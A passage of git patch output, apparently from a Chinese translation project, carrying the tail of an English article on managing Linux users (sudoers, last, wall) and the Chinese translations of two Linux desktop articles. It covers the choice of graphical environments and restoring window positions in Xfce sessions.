+Some Linux systems have a wheel group that gives members the ability to run commands as root. In this case, the /etc/sudoers file references this group. On Debian systems, this group is called sudo, but it works the same way and you'll see a reference like this in the /etc/sudoers file:
+```
+%sudo ALL=(ALL:ALL) ALL
+
+```
+
+This setting basically means that anyone in the wheel or sudo group can run all commands with the power of root once they preface them with the sudo command.
+
+You can also add more limited privileges to the sudoers file -- maybe to give particular users the ability to run one or two commands as root. If you do, you should also periodically review the /etc/sudoers file to gauge how much privilege users have and very that the privileges provided are still required.
+
+In the command shown below, we're looking at the active lines in the /etc/sudoers file. The most interesting lines in this file include the path set for commands that can be run using the sudo command and the two groups that are allowed to run commands via sudo. As was just mentioned, individuals can be given permissions by being directly included in the sudoers file, but it is generally better practice to define privileges through group memberships.
+```
+# cat /etc/sudoers | grep -v "^#" | grep -v "^$"
+Defaults env_reset
+Defaults mail_badpass
+Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
+root ALL=(ALL:ALL) ALL
+%admin ALL=(ALL) ALL <== admin group
+%sudo ALL=(ALL:ALL) ALL <== sudo group
+
+```
+
+### Checking on logins
+
+To see when a user last logged in, you can use a command like this one:
+```
+# last jdoe
+jdoe pts/18 192.168.0.11 Thu Sep 14 08:44 - 11:48 (00:04)
+jdoe pts/18 192.168.0.11 Thu Sep 14 13:43 - 18:44 (00:00)
+jdoe pts/18 192.168.0.11 Thu Sep 14 19:42 - 19:43 (00:00)
+
+```
+
+If you want to see when each of your users last logged in, you can run the last command through a loop like this one:
+```
+$ for user in `ls /home`; do last $user | head -1; done
+
+jdoe pts/18 192.168.0.11 Thu Sep 14 19:42 - 19:43 (00:03)
+
+rocket pts/18 192.168.0.11 Thu Sep 14 13:02 - 13:02 (00:00)
+shs pts/17 192.168.0.11 Thu Sep 14 12:45 still logged in
+
+
+```
+
+This command will only show you users who have logged on since the current wtmp file became active. The blank lines indicate that some users have never logged in since that time, but doesn't call them out. A better command would be this one that clear displays the users who have not logged in at all in this time period:
+```
+$ for user in `ls /home`; do echo -n "$user ";last $user | head -1 | awk '{print substr($0,40)}'; done
+dhayes
+jdoe pts/18 192.168.0.11 Thu Sep 14 19:42 - 19:43
+peanut pts/19 192.168.0.29 Mon Sep 11 09:15 - 17:11
+rocket pts/18 192.168.0.11 Thu Sep 14 13:02 - 13:02
+shs pts/17 192.168.0.11 Thu Sep 14 12:45 still logged
+tsmith
+
+```
+
+That command is a lot to type, but could be turned into a script to make it a lot easier to use.
+```
+#!/bin/bash
+
+for user in `ls /home`
+do
+ echo -n "$user ";last $user | head -1 | awk '{print substr($0,40)}'
+done
+
+```
+
+Sometimes this kind of information can alert you to changes in users' roles that suggest they may no longer need the accounts in question.
+
+### Communicating with users
+
+Linux systems provide a number of ways to communicate with your users. You can add messages to the /etc/motd file that will be displayed when a user logs into a server using a terminal connection. You can also message users with commands such as write (message to single user) or wall (write to all logled in users.
+```
+$ wall System will go down in one hour
+
+Broadcast message from shs@stinkbug (pts/17) (Thu Sep 14 14:04:16 2017):
+
+System will go down in one hour
+
+```
+
+Important messages should probably be delivered through multiple channels as it's difficult to predict what users will actually notice. Together, message-of-the-day (motd), wall, and email notifications might stand of chance of getting most of your users' attention.
+
+### Paying attention to log files
+
+Paying attention to log files can also help you understand user activity. In particular, the /var/log/auth.log file will show you user login and logout activity, creation of new groups, etc. The /var/log/messages or /var/log/syslog files will tell you more about system activity.
+
+### Tracking problems and requests
+
+Whether or not you install a ticketing application on your Linux system, it's important to track the problems that your users run into and the requests that they make. Your users won't be happy if some portion of their requests fall through the proverbial cracks. Even a paper log could be helpful or, better yet, a spreadsheet that allows you to notice what issues are still outstanding and what the root cause of the problems turned out to be. Ensuring that problems and requests are addressed is important and logs can also help you remember what you had to do to address a problem that re-emerges many months or even years later.
+
+### Wrap-up
+
+Managing user accounts on a busy server depends in part on starting out with well configured defaults and in part on monitoring user activities and problems encountered. Users are likely to be happy if they feel you are responsive to their concerns and know what to expect when system upgrades are needed.
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.networkworld.com/article/3225109/linux/managing-users-on-linux-systems.html
+
+作者:[Sandra Henry-Stocker][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.networkworld.com/author/Sandra-Henry_Stocker/
From 1e59051b0c78e9bcadf802474ef73229bd7d6fe2 Mon Sep 17 00:00:00 2001
From: ChenYi <31087327+cyleft@users.noreply.github.com>
Date: Sat, 6 Jan 2018 12:17:41 +0800
Subject: [PATCH 059/371] Delete 20171219 Migrating to Linux- Graphical
Environments.md
---
...rating to Linux- Graphical Environments.md | 110 ------------------
1 file changed, 110 deletions(-)
delete mode 100644 sources/tech/20171219 Migrating to Linux- Graphical Environments.md
diff --git a/sources/tech/20171219 Migrating to Linux- Graphical Environments.md b/sources/tech/20171219 Migrating to Linux- Graphical Environments.md
deleted file mode 100644
index 907d334533..0000000000
--- a/sources/tech/20171219 Migrating to Linux- Graphical Environments.md
+++ /dev/null
@@ -1,110 +0,0 @@
-translating by CYLeft
-
-Migrating to Linux: Graphical Environments
-======
-This is the third article in our series on migrating to Linux. If you missed earlier articles, they provided an [introduction to Linux for new users][1] and an [overview of Linux files and filesystems][2]. In this article, we'll discuss graphical environments. One of the advantages of Linux is that you have lots of choices, and you can select a graphical interface and customize it to work just the way you like it.
-
-Some of the popular graphical environments in Linux include: Cinnamon, Gnome, KDE Plasma, Xfce, and MATE, but there are many options.
-
-One thing that is often confusing to new Linux users is that, although specific Linux distributions have a default graphical environment, usually you can change the graphical interface at any time. This is different from what people are used to with Windows and Mac OS. The distribution and the graphical environment are separate things, and in many cases, they aren't tightly coupled together. Additionally, you can run applications built for one graphical environment inside other graphical environments. For example, an application built for the KDE Plasma graphical interface will typically run just fine in the Gnome desktop graphical environment.
-
-Some Linux graphical environments try to mimic Microsoft Windows or Apple's MacOS to a degree because that's what some people are familiar with, but other graphical interfaces are unique.
-
-Below, I'll cover several options showcasing different graphical environments running on different distributions. If you are unsure about which distribution to go with, I recommend starting with [Ubuntu][3]. Get the Long Term Support (LTS) version (which is 16.04.3 at the time of writing). Ubuntu is very stable and easy to use.
-
-### Transitioning from Mac
-
-The Elementary OS distribution provides a very Mac-like interface. It's default graphical environment is called Pantheon, and it makes transitioning from a Mac easy. It has a dock at the bottom of the screen and is designed to be extremely simple to use. In its aim to keep things simple, many of the default apps don't even have menus. Instead, there are buttons and controls on the title bar of the application (Figure 1).
-
-
-![Elementary OS][5]
-
-Figure 1: Elementary OS with Pantheon.
-
-The Ubuntu distribution presents a default graphical interface that is also very Mac like. Ubuntu 17.04 or older uses the graphical environment called Unity, which by default places the dock on the left side of the screen and has a global menu bar area at the top that is shared across all applications. Note that newer versions of Ubuntu are switching to the Gnome environment.
-
-### Transitioning from Windows
-
-ChaletOS models its interface after Windows to help make migrating from Windows easier. ChaletOS used the graphical environment called Xfce (Figure 2). It has a home/start menu in the usual lower left corner of the screen with the search bar. There are desktop icons and notifications in the lower right corner. It looks so much like Windows that, at first glance, people may even assume you are running Windows.
-
-The Zorin OS distribution also tries to mimic Windows. Zorin OS uses the Gnome desktop modified to work like Windows' graphical interface. The start button is at the bottom left with the notification and indicator panel on the lower right. The start button brings up a Windows-like list of applications and a search bar to search.
-
-### Unique Environments
-
-One of the most commonly used graphical environments for Linux is the Gnome desktop (Figure 3). Many distributions use Gnome as the default graphical environment. Gnome by default doesn't try to be like Windows or MacOS but aims for elegance and ease of use in its own way.
-
-The Cinnamon environment was created mostly out of a negative reaction to the Gnome desktop environment when it changed drastically from version 2 to version 3. Although Cinnamon doesn't look like the older Gnome desktop version 2, it attempts to provide a simple interface, which functions somewhat similar to that of Windows XP.
-
-The graphical environment called MATE is modeled directly after Gnome version 2, which has a menu bar at the top of the screen for applications and settings, and it presents a panel at the bottom of the screen for running application tabs and other widgets.
-
-The KDE plasma environment is built around a widget interface where widgets can be installed on the desktop or in a panel (Figure 4).
-
-![KDE Plasma][8]
-
-Figure 4: Kubuntu with KDE Plasma.
-
-[Used with permission][6]
-
-No graphical environment is better than another. They're just different to suit different people's tastes. And again, if the options seem too much, start with [Ubuntu][3].
-
-### Differences and Similarities
-
-Different operating systems do some things differently, which can make the transition challenging. For example, menus may appear in different places and settings may use different paths to access options. Here I list a few things that are similar and different in Linux to help ease the adjustment.
-
-### Mouse
-
-The mouse often works differently in Linux than it does in Windows and MacOS. In Windows and Mac, you double-click on most things to open them up. In Linux, many Linux graphical interfaces are set so that you single click on the item to open it.
-
-Also in Windows, you usually have to click on a window to make it the focused window. In Linux, many interfaces are set so that the focus window is the one under the mouse, even if it's not on top. The difference can be subtle, and sometimes the behavior is surprising. For example, in Windows if you have a background application (not the top window) and you move the mouse over it, without clicking, and scroll the mouse wheel, the top application window will scroll. In Linux, the background window (the one with the mouse over it) will scroll instead.
-
-### Menus
-
-Application menus are a staple of computer programs and recently there seems to be a movement to move the menus out of the way or to remove them altogether. So when migrating to Linux, you may not find menus where you expect. The application menu might be in a global shared menu bar like on MacOS. The menu might be below a "more options" icon, similar to those in many mobile applications. Or, the menu may be removed altogether in exchange for buttons, as with some of the apps in the Pantheon environment in Elementary OS.
-
-### Workspaces
-
-Many Linux graphical environments present multiple workspaces. A workspace fills your entire screen and contains windows of some running applications. Switching to a different workspace will change which applications are visible. The concept is to group the open applications used for one project together on one workspace and those for another project on a different workspace.
-
-Not everyone needs or even likes workspaces, but I mention these because sometimes, as a newcomer, you might accidentally switch workspaces with a key combination, and go, "Hey! where'd my applications go?" If all you see is the desktop wallpaper image where you expected to see your apps, chances are you've just switched workspaces, and your programs are still running in a workspace that is now not visible. In many Linux environments, you can switch workspaces by pressing Alt-Ctrl and then an arrow (up, down. left or right). Hopefully, you'll see your programs still there in another workspace.
-
-Of course, if you happen to like workspaces (many people do), then you have found a useful default feature in Linux.
-
-### Settings
-
-Many Linux graphical environments also have some type of settings program or settings panel that let you configure settings on the machine. Note that similarly to Windows and MacOS, things in Linux can be configured in fine detail, and not all of these detailed settings can be found in the settings program. These settings, though, should be enough for most of the things you'll need to set on a typical desktop system, such as selecting the desktop wallpaper, changing how long before the screen goes blank, and connecting to printers, to name a few.
-
-The settings presented in the application will usually not be grouped the same way or named the same way they are on Windows or MacOS. Even different graphical interfaces in Linux can present settings differently, which may take time to adjust to. Online search, of course, is a great place to search for answers on how to configure things in your graphical environment.
-
-### Applications
-
-Finally, applications in Linux might be different. You will likely find some familiar applications but others may be completely new to you. For example, you can find Firefox, Chrome, and Skype on Linux. If you can't find a specific app, there's usually an alternative program you can use. If not, you can run many Windows applications in a compatibility layer called WINE.
-
-On many Linux graphical environments, you can bring up the applications menu by pressing the Windows Logo key on the keyboard. In others, you need to click on a start/home button or click on an applications menu. In many of the graphical environments, you can search for an application by category rather than by its specific name. For example, if you want to use an editor program but you don't know what it's called, you can bring up the application menu and enter "editor" in the search bar, and it will show you one or more applications that are considered editors.
-
-To get you started, here is a short list of a few applications and potential Linux alternatives.
-
-[linux][10]
-
-Note that this list is by no means comprehensive; Linux offers a multitude of options to meet your needs.
-
-Learn more about Linux through the free ["Introduction to Linux" ][9]course from The Linux Foundation and edX.
-
---------------------------------------------------------------------------------
-
-via: https://www.linux.com/blog/learn/2017/12/migrating-linux-graphical-environments
-
-作者:[John Bonesio][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.linux.com/users/johnbonesio
-[1]:https://www.linux.com/blog/learn/intro-to-linux/2017/10/migrating-linux-introduction
-[2]:https://www.linux.com/blog/learn/intro-to-linux/2017/11/migrating-linux-disks-files-and-filesystems
-[3]:https://www.evernote.com/OutboundRedirect.action?dest=https%3A%2F%2Fwww.ubuntu.com%2Fdownload%2Fdesktop
-[5]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/elementaryos.png?itok=kJk2-BsL (Elementary OS)
-[8]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/kubuntu.png?itok=a2E7ttaa (KDE Plasma)
-[9]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux
-
-[10]: https://www.linux.com/sites/lcom/files/styles/rendered_file/public/linux-options.png?itok=lkqD1UMj
From b935033a84be6c75ff0cf9361399ed23ad0fa155 Mon Sep 17 00:00:00 2001
From: ChenYi <31087327+cyleft@users.noreply.github.com>
Date: Sat, 6 Jan 2018 12:19:46 +0800
Subject: [PATCH 060/371] translated
Migrating to Linux: Graphical Environments
---
...rating to Linux- Graphical Environments.md | 109 ++++++++++++++++++
1 file changed, 109 insertions(+)
create mode 100644 translated/tech/20171219 Migrating to Linux- Graphical Environments.md
diff --git a/translated/tech/20171219 Migrating to Linux- Graphical Environments.md b/translated/tech/20171219 Migrating to Linux- Graphical Environments.md
new file mode 100644
index 0000000000..c4450237a8
--- /dev/null
+++ b/translated/tech/20171219 Migrating to Linux- Graphical Environments.md
@@ -0,0 +1,109 @@
+迁移到 Linux 系统:图形操作环境
+======
+
+这是我们迁移到 Linux 系统系列的第三篇文章。如果你错过了先前的两篇,这里供有两文的链接 [Linux 新手指导][1] 和 [Linux 文件及文件系统][2]。本文中,我们将讨论图形操作环境。在 Linux 系统中,你可以依照喜好选择并且定制一个图形界面,你有很大的选择余地,这也是 Linux 优越的体验之一。
+
+一些主流的 Linux 图形界面包括:Cinnamon、Gnome、KDE Plasma、Xfce 和 MATE,总之这里有很多选择。
+
+有一点经常混淆 Linux 新手,虽然特定的 Linux 系统分配了一个缺省的图形环境,但是一般你可以随时更换这个图形接口。这和 Windows 或 Mac OS 的惯用者的定势思维不同。安装图形环境是一件独立的事情,很多时候,Linux 和其图形环境连接地并不紧密。此外,你在一个图形环境构建运行的程序同样适用于另一个图形环境。比如说一个为 KDE Plasma 图形环境编写的应用程序完全适用于 Gnome 桌面图形环境。
+
+由于人们熟悉 Windwos 和 MacOS 系统,部分 Linux 操作系统的图形环境在一定程度上尝试着去模仿它们。但是另一些 Linux 图形界面是独特的。
+
+下面,我将就一些不同的 Linux 发行版,展示几个 Linux 图形环境。如果你不确定应该采用那个 Linux 发行版,那我建议你使用有长期支持(LTS)的版本,[Ubuntu][3](Ubuntu 16.04 正在开发)。Ubuntu 稳定且真的非常好用。
+
+### 由 Mac 过渡
+
+Elementary OS 发行版提供了和 Mac 系统风格很接近的界面。它的默认图形环境被称作 Pantheon,是一款很适合 Mac 用户过渡使用的图形环境。这款图形界面发行版的屏幕底部有一个停靠栏,专为极简者使用。为了保持简约的风格,很多默认的应用程序甚至都不会有自己的菜单。相反,它们的按钮和控件在应用程序的标题栏上(图 1)。
+
+
+![Elementary OS][5]
+
+图 1: Elementary OS Pantheon.
+
+Ubuntu 发行版提供的一个默认的图形界面,也和 Mac 相似。Ubuntu 17.04 或者更老的版本都使用 Unity 图形环境,Unity 停靠栏的默认位置在屏幕的左边,屏幕顶部有一个全局应用程序共享的菜单栏。
+
+### 由 Windows 过渡
+
+在 Windows 之后,ChaletOS 界面模块帮助 Windows 用户轻松的过渡到 Linux。ChaletOS 使用的图形环境是 Xfce(图 2)。在屏幕的左下角有一个开始按钮,主页目录里有一个搜索栏。屏幕的右下角是一个桌面图标和一些通知信息。这看起来和 Windows 非常像,乍一看,可能都会以为桌面跑的是 Windows。
+
+Zorin OS 发行版同样尝试模仿 Windows。 Zorin OS 使用的 Dnome 的改进桌面工作起来和 Windows 的图形界面很相似。左下角的开始按钮、右下角的通知栏和信息通知栏。开始按钮会弹出一个和 Windows无异的应用程序列表和搜索框。
+
+### 独特的图形环境
+
+Gnome 桌面(图 3)是最常用的图形环境之一。许多发行版将 Gnome 作为默认的图形环境。Gnome 并不打算模仿 Windows 或是 MacOS,而是以其自身的优雅和易用为目标。
+
+Cinnamon 环境为摆脱 Gnome 桌面环境消极的一面而被创造,在版本 2 到 版本 3 有彻底的改变。尽管 Cinnamon 和前辈 Gnome version 2 外观不相似,但是它依旧尝试提供一个简约的界面,而且它的功能和 Windows XP 类似。
+
+MATE 图形环境在 Gnome version 2 之后直接建模,在它的屏幕顶部有一个用作设置和存放应用的菜单栏,底部提供了一个应用程序运行选项卡和一些其他组件。
+
+KDE plasma 是一个为了可以在桌面或是面板上安装组件而建立(图 4)。
+
+![KDE Plasma][8]
+
+图 4: 安装了 KDE Plasma 的 Kubuntu 操作系统。
+
+[使用许可][6]
+
+没有图形环境本身就是一个很好的图形环境。不同的风格适用不同的用户风格。另外,似乎从 [Ubuntu][3] 开始有繁多的选项。
+
+### 相似与不同
+
+不同的操作系统处理事务方式不同,这会给使用者的过渡带来挑战。比如说,菜单栏可能出现在不同的位置,然后设置有可能用不同的选项入口路径。我列举了一些相似或不同地方来帮助减少 Linux 调整。
+
+### 鼠标
+
+Linux 的鼠标通常和 Windows 与 MacOS 的工作方式有所差异。在 Windows 或 Mac,双击标签,你几乎可以打开任何事物,而这在 Linux 图形界面中很多都被设置为单击。
+
+此外在 Windows 系统中,你通常通过单机窗口获取焦点。在 Linux,很多窗口的焦点获取被设置为鼠标悬浮,即便鼠标悬浮下的窗口并不在屏幕顶端。这种微妙的差异有时候会让人很吃惊。比如说,在 Windows 中,假如有一个后台应用(不在屏幕顶层),你移动鼠标到它的上面,不点击鼠标仅仅转动鼠标滚轮,顶层窗口不会滚动。而在 Linux 中,后台窗口(鼠标悬停的那个窗口)会滚动。
+
+### 菜单
+
+应用菜单是电脑程序的一个基本部件,最近似乎可以调整移动菜单栏到不碍事的地方,甚至干脆完全删除。大概,当你迁移到 Linux,你可能找不到你期待的菜单。应用程序菜单会像 MacOS一样出现在全局共享菜单栏内。和很多移动应用程序一样,菜单可能在“更多选项”的图标里。或者,这个菜单干脆被完全移除被一个按钮取代,正如在 Elementary OS Pantheon 环境里的一些程序一样。
+
+### 工作空间
+
+很多 Linux 图形环境提供了多个工作空间。一个工作空间包含的正在运行的程序窗口充盈了整个屏幕。切换到不同的工作空间将会该片程序的可见性。这个概念是把当前工程运行使用的全部应用程序分组到一个工作空间,而一些为另一个工程使用的应用程序会被分组到不同的工作空间。
+
+不是每一个人都需要甚至是喜欢工作空间,但是我提到它是因为,作为一个新手,你可能无意间通过一个组合键切换了工作空间,然后,“喂!我的应用程序哪去了?”如果你看到的还是你熟悉的煮面壁纸,那你可能只是切换了工作空间,你所有的应用程序还在一个工作空间运行,只是现在不可见。在很多 Linux 环境中,通过敲击 Alt-Ctrl 和一个箭头(上、下、左或右)可以切换工作空间。发现你的应用程序一直都在另一个工作空间里运行还是很有很可能的。
+
+当然,如果你刚好喜欢工作空间(很多人都喜欢),然后你就发现了一个 Linux 很有用的默认功能。
+
+### 设置
+
+许多 Linux 图形环境提供一些类型的设置程序或是面板让你在机器上配置设置。值得注意的是类似 Windows 和 MacOS,Linux 可以配置好很多细节,但不是所有的详细设置都可以在设置程序上找到。但是这些设置项已经足够满足大部分典型的桌面系统,比如选择桌面壁纸,改变息屏时间,连接打印机等其他一些设置。
+
+和 Windows 或者 MacOS 相比,Linux 的应用程序设置的分组或是命名都有不同的方式。甚至同是 Linux 系统,不同的图形界面也会出现不同的设置,这可能需要时间适应。当然,在你的图形环境中设置配置的问题可以通过在线查询这样一个不错的方法解决。
+
+### 应用程序
+
+最后,Linux 的应用程序也可能不同。你可能会发现一些熟悉的应用程序,但是对你来说更多的将会是崭新的应用。比如说,你能在 Linux 上找到 Firefox、Chrome和 Skype。如果不能找到特定的应用程序,通常你能使用一些替代程序。如果还是不能,那你可以使用 WINE 这样的兼容层来运行 Windows 的应用程序。
+
+在很多 Linux 图形环境中,你可以通过敲击 Windows 的标志键来打开应用程序菜单栏。在其他一些情况中,你不都不点击开始或家按钮俩启动应用程序菜单。很多图形环境中,你可以通过分类搜索到应用程序而不一定需要它的特定程序名。比如说,你要使用你不清除名字编辑器程序,这时候,你可以在应用程序菜单栏键的搜索框中键入“editor”字样,他将为你展示一个甚至更多的被认为是编辑器类的应用程序。
+
+帮你开个头,这里列举了一点可能成为 Linux 系统使用的替代程序。
+
+[linux][10]
+
+请注意,Linux 提供了大量的满足你需求的选择,这张表里列举的一点也不完整。
+
+通过 [“Linux 指导”][9] Linux 基金会的免费在线课程,了解更多关于 Linux 内容。
+
+--------------------------------------------------------------------------------
+
+via: https://www.linux.com/blog/learn/2017/12/migrating-linux-graphical-environments
+
+作者:[John Bonesio][a]
+译者:[译者ID](https://github.com/CYLeft)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.linux.com/users/johnbonesio
+[1]:https://www.linux.com/blog/learn/intro-to-linux/2017/10/migrating-linux-introduction
+[2]:https://www.linux.com/blog/learn/intro-to-linux/2017/11/migrating-linux-disks-files-and-filesystems
+[3]:https://www.evernote.com/OutboundRedirect.action?dest=https%3A%2F%2Fwww.ubuntu.com%2Fdownload%2Fdesktop
+[5]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/elementaryos.png?itok=kJk2-BsL (Elementary OS)
+[8]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/kubuntu.png?itok=a2E7ttaa (KDE Plasma)
+[9]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux
+
+[10]: https://www.linux.com/sites/lcom/files/styles/rendered_file/public/linux-options.png?itok=lkqD1UMj
From a7895d88b78ce60a5d3df7f00d9690f084992b53 Mon Sep 17 00:00:00 2001
From: wxy
Date: Sat, 6 Jan 2018 12:20:29 +0800
Subject: [PATCH 061/371] PRF&PUB:20171216 Saving window position in Xfce
session.md
@lujun9972 https://linux.cn/article-9207-1.html
---
... Saving window position in Xfce session.md | 68 +++++++++++++++++++
... Saving window position in Xfce session.md | 68 -------------------
2 files changed, 68 insertions(+), 68 deletions(-)
create mode 100644 published/20171216 Saving window position in Xfce session.md
delete mode 100644 translated/tech/20171216 Saving window position in Xfce session.md
diff --git a/published/20171216 Saving window position in Xfce session.md b/published/20171216 Saving window position in Xfce session.md
new file mode 100644
index 0000000000..b744f803bd
--- /dev/null
+++ b/published/20171216 Saving window position in Xfce session.md
@@ -0,0 +1,68 @@
+在 Xfce 会话中保存窗口的位置
+======
+
+摘要:如果你发现 Xfce 会话不能保存窗口的位置,那么启用“登出时保存”,然后登出再重新登录一次,可能就能永久修复这个问题了(如果你想要保持相同的会话,再次登录时恢复的话)。 下面是详细内容。
+
+我用 Xfce 作桌面有些年头了,但是每次重启后进入之前保存的会话时总会有问题出现。 登录后, 之前会话中保存的应用都会启动, 但是所有的工作区和窗口位置数据都会丢失, 导致所有应用都堆在默认工作区中,乱糟糟的。
+
+多年来,很多人都报告过这个问题(Ubuntu、Xfce 以及 Red Hat 的 bug 追踪系统中都有登记)。 虽然 Xfce4.10 中已经修复过了一个相关 bug, 但是我用的 Xfce4.12 依然有这个问题。 如果不是我的其中一个系统能够正常的恢复各个窗口的位置,我几乎都要放弃找出问题的原因了(事实上我之前已经放弃过很多次了)。
+
+今天,我深入对比了两个系统的不同点,最终解决了这个问题。 我现在就把结果写出来, 以防有人也遇到相同的问题。
+
+提前的一些说明:
+
+1. 由于这个笔记本只有我在用,因此我几乎不登出我的 Xfce 会话。 我一般只是休眠然后唤醒,除非由于要对内核打补丁才进行重启, 或者由于某些改动损毁了休眠镜像导致系统从休眠中唤醒时卡住了而不得不重启。 另外,我也很少使用 Xfce 工具栏上的重启按钮重启;一般我只是运行一下 `reboot`。
+2. 我会使用 xterm 和 Emacs, 这些不太复杂的 X 应用无法记住他们自己的窗口位置。
+
+Xfce 将会话信息保存到主用户目录中的 `.cache/sessions` 目录中。在经过仔细检查后发现,在正常的系统中有两类文件存储在该目录中,而在非正常的系统中,只有一类文件存在该目录下。
+
+其中一类文件的名字类似 `xfce4-session-hostname:0` 这样的,其中包含的内容类似下面这样的:
+
+```
+Client9_ClientId=2a654109b-e4d0-40e4-a910-e58717faa80b
+Client9_Hostname=local/hostname
+Client9_CloneCommand=xterm
+Client9_RestartCommand=xterm,-xtsessionID,2a654109b-e4d0-40e4-a910-e58717faa80b
+Client9_Program=xterm
+Client9_UserId=user
+```
+
+这个文件记录了所有正在运行的程序。如果你进入“设置 -> 会话和启动”并清除会话缓存, 就会删掉这种文件。 当你保存当前会话时, 又会创建这种文件。 这就是 Xfce 知道要启动哪些应用的原因。 但是请注意,上面并没有包含任何窗口位置的信息。 (我还曾经以为可以根据会话 ID 来找到其他地方的一些相关信息,但是并没有)。
+
+正常工作的系统在目录中还有另一类文件,名字类似 `xfwm4-2d4c9d4cb-5f6b-41b4-b9d7-5cf7ac3d7e49.state` 这样的。 其中文件内容类似下面这样:
+
+```
+[CLIENT] 0x200000f
+[CLIENT_ID] 2a9e5b8ed-1851-4c11-82cf-e51710dcf733
+[CLIENT_LEADER] 0x200000f
+[RES_NAME] xterm
+[RES_CLASS] XTerm
+[WM_NAME] xterm
+[WM_COMMAND] (1) "xterm"
+[GEOMETRY] (860,35,817,1042)
+[GEOMETRY-MAXIMIZED] (860,35,817,1042)
+[SCREEN] 0
+[DESK] 2
+[FLAGS] 0x0
+```
+
+注意这里的 `GEOMETRY` 和 `DESK` 记录的正是我们想要的窗口位置以及工作区号。因此不能保存窗口位置的原因就是因为缺少这个文件。
+
+继续深入下去,我发现当你明确地手工保存会话时,之后保存第一个文件而不会保存第二个文件。 但是当登出保存会话时则会保存第二个文件。 因此, 我进入“设置 -> 会话和启动”中,在“通用”标签页中启用登出时自动保存会话, 然后登出后再进来, 然后, 第二个文件就出现了。 再然后我又关闭了登出时自动保存会话。(因为我一般在排好屏幕后就保存一个会话, 但是我不希望做出的改变也会影响到这个保存的会话, 如有必要我会明确地手工进行保存),现在我的窗口位置能够正常的恢复了。
+
+这也解释了为什么有的人会有问题而有的人没有问题: 有的人可能一直都是用登出按钮重启,而有些人则是手工重启(或者仅仅是由于系统崩溃了才重启)。
+
+顺带一提,这类问题, 以及为解决问题而付出的努力,正是我赞同为软件存储的状态文件编写 man 页或其他类似文档的原因。 为用户编写文档,不仅能帮助别人深入挖掘产生奇怪问题的原因, 也能让软件作者注意到软件中那些奇怪的东西, 比如将会话状态存储到两个独立的文件中去。
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.eyrie.org/~eagle/journal/2017-12/001.html
+
+作者:[J. R. R. Tolkien][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[wxy](https://github.com/wxy)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.eyrie.org
diff --git a/translated/tech/20171216 Saving window position in Xfce session.md b/translated/tech/20171216 Saving window position in Xfce session.md
deleted file mode 100644
index e57a667ccb..0000000000
--- a/translated/tech/20171216 Saving window position in Xfce session.md
+++ /dev/null
@@ -1,68 +0,0 @@
-在 Xfce 会话中保存窗口的位置
-======
-摘要:如果你发现 Xfce session 不能保存窗口的位置,那么启用 `save on logout` 然后登出再进来一次,可能就能修复这个问题了 (permanently, if you like keeping the same session and turn saving back off again)。 下面是详细内容。
-
-我用 Xfce 作桌面有些年头了,但是每次重启后进入之前保存的 session 时总会有问题出现。 登陆后, 之前 session 中保存的应用都会启动, 但是所有的工作区和窗口位置数据会丢失, 导致所有应用都堆在默认工作区中,乱糟糟的。
-
-多年来,很多人都报道过这个问题( Ubuntu, Xfce, 以及 Red Hat 的 bug 追踪系统中都有登记这个 bug)。 虽然 Xfce4.10 中已经修复过了一个相关 bug, 但是我用的 Xfce4.12 依然有这个问题。 如果不是我的其中一个系统能够正常的回复各个窗口的位置,我几乎都要放弃找出问题的原因了(事实上我之前已经放弃过很多次了)。
-
-今天,我深入对比了两个系统的不同点,最终解决了这个问题。 我现在就把结果写出来, 以防有人也遇到相同的问题。
-
-提前的一些说明:
-
- 1。由于这个笔记本只有我在用,因此我几乎不登出我的 Xfce session。 我一般只是休眠然后唤醒,除非由于要对内核打补丁才进行重启, 或者由于某些改动损毁了休眠镜像导致系统从休眠中唤醒时卡住了而不得不重启。 另外,我也很少使用 Xfce 工具栏上的重启按钮重启; 一般我只是运行一下 `reboot`。
-
- 2。我会使用 xterm 和 Emacs, 这些 X 应用写的不是很好,无法记住他们自己的窗口位置。
-
-Xfce 将 sessions 信息保存到主用户目录中的 `.cache/sessions` 目录中。在经过仔细检查后发现,在正常的系统中有两类文件存储在该目录中,而在非正常的系统中,只有一类文件存在该目录下。
-
-其中一类文件的名字类似 `xfce4-session-hostname:0` 这样的,其中包含的内容类似下面这样的:
-```
-Client9_ClientId=2a654109b-e4d0-40e4-a910-e58717faa80b
-Client9_Hostname=local/hostname
-Client9_CloneCommand=xterm
-Client9_RestartCommand=xterm,-xtsessionID,2a654109b-e4d0-40e4-a910-e58717faa80b
-Client9_Program=xterm
-Client9_UserId=user
-
-```
-
-这个文件记录了所有正在运行的程序。如果你进入 Settings -> Session and Startup 并清除 session 缓存, 就会删掉这种文件。 当你保存当前 session 时, 又会创建这种文件。 这就是 Xfce 知道要启动哪些应用的原因。 但是请注意,上面并没有包含任何窗口位置的信息。 (我还曾经以为可以根据 session ID 来找到其他地方的一些相关信息,但是失败了)。
-
-正常工作的系统在目录中还有另一类文件,名字类似 `xfwm4-2d4c9d4cb-5f6b-41b4-b9d7-5cf7ac3d7e49.state` 这样的。 其中文件内容类似下面这样:
-```
-[CLIENT] 0x200000f
- [CLIENT_ID] 2a9e5b8ed-1851-4c11-82cf-e51710dcf733
